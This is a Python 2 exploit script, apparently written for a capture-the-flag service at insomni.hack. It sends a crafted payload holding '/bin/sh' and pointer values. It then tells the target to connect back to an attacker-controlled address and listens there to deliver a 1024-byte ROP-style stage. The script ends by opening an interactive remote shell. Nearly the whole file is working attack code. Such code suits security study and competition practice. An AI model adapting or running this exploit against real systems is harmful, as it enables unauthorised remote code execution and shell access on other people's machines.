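import socket
# pack(), Remote(), xlocal() and dbg() come from codez (star import kept as in
# the original); this script is Python 2 (str is bytes for all socket I/O).
from codez import *
from threading import Thread

# Connection parameters. RHOST:RPORT is the vulnerable service; LHOST:LPORT is
# the address the service is told to connect back to (handle_server listens there).
RHOST = 'biotchslap.insomni.hack'
RPORT = 1070
LHOST = '192.168.204.101'
LPORT = 1070

# Address that every payload piece below is computed from. Presumably a
# writable region of the target binary (the "/bin/sh" sent in the first
# request is pointed at MEM_BASE + 16) -- verify against the binary.
MEM_BASE = 0x496640

# Cyclic (pattern_create-style) string for locating the overwrite offset.
# Not used by the exploit path below; kept for re-deriving offsets.
pt = 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAnAASAAoAATAApAAUAAqAAVAArAAWAAsAAXAAtAAYAAuAAZAAvAAwA'


def _build_stage():
    """Return the 1024-byte stage sent to the target once it connects back.

    Layout (padding lengths are what the code shows; the meaning of each
    constant is not established here):
      40 x 'A', two QWORDs
      64 x 'B', two QWORDs
      four identical QWORDs + 8 NULs + 16 x 'E' + one zero QWORD,
        padded with 'r' to 200 bytes
      two final QWORDs
    then padded with 'x' to exactly 1024 bytes.
    """
    chunks = [
        'A' * 40 + pack('QQ', MEM_BASE - 0x8c, 0x422D20),
        'B' * 64 + pack('QQ', MEM_BASE - 0x30, 0x04501d4),
        (pack('Q', 0x4177FC) * 4 + "\x00" * 8 + 'E' * 16 + pack('Q', 0)).ljust(200, 'r'),
        pack('QQ', 0x4261ac, 0x4931E0),
        # pack('Q', 0x4239c0),   # alternative final QWORD, disabled in the original
    ]
    return ''.join(chunks).ljust(1024, 'x')


def _open_listener(host='0.0.0.0', port=LPORT):
    """Bind and listen on host:port and return the listening socket.

    Kept separate from handle_server so the caller can have the port open
    *before* the target is told to connect back to it.
    """
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(5)
    return s


def handle_server(listener=None):
    """Accept one connect-back from the target and feed it the stage.

    listener: an already-listening socket from _open_listener(); when None,
    one is created here on 0.0.0.0:LPORT (the original behaviour).

    The listening socket is closed once accept() returns (or fails). The
    accepted socket is deliberately left open: the exploited process may still
    use it while the shell is in use, and closing it early could tear that
    connection down. Note that accept() has no timeout -- if the target never
    connects back, this thread (and the final t.join()) blocks forever.
    """
    s = listener if listener is not None else _open_listener()
    try:
        print('asdf')
        sin, peer = s.accept()
    finally:
        s.close()
    # The listener is on 0.0.0.0, so anything on the network can reach it and
    # whoever connects first gets the stage; log the peer so a stray or
    # hostile connection is visible instead of silently consuming the accept.
    print('connect-back from %s:%d' % peer)
    # sin.recv(1024)
    sin.sendall('1024'.ljust(4, "\x00"))
    # sendall, not send: a short write of the 1024-byte stage would leave the
    # target with a truncated payload.
    sin.sendall(_build_stage())


# ---- main flow -------------------------------------------------------------
# 0x000000000043dd48  (address noted in the original; its role is not recorded)

r = Remote(RHOST, RPORT)
# r = xlocal()
# dbg()

# Open the listening port before the target is handed LHOST, so the
# connect-back cannot race the bind/listen in the thread.
t = Thread(target=handle_server, args=(_open_listener(),))
t.start()

r.read(':')
# First field: two QWORDs (0xdd and a pointer to MEM_BASE + 16) followed by
# "/bin/sh", NUL-padded to 31 bytes.
r.write((pack('QQ', 0xdd, MEM_BASE + 8 * 2) + "/bin/sh").ljust(31, "\x00"))
r.read('?')
r.read(':')
# Connect-back address: newline-terminated, NUL-padded to a 16-byte field.
# A 15-character dotted quad plus '\n' fills it exactly; anything longer
# would overrun the field, so refuse it rather than send a malformed value.
if len(LHOST) > 15:
    raise ValueError('LHOST does not fit the 16-byte address field: %r' % LHOST)
r.write((LHOST + '\n').ljust(16, "\x00"))
# r.write('127.0.0.1\n'.ljust(16,"\x00"))   # local-test variant
print(r.read('?'))
r.write('0000')
r.interactive()
t.join()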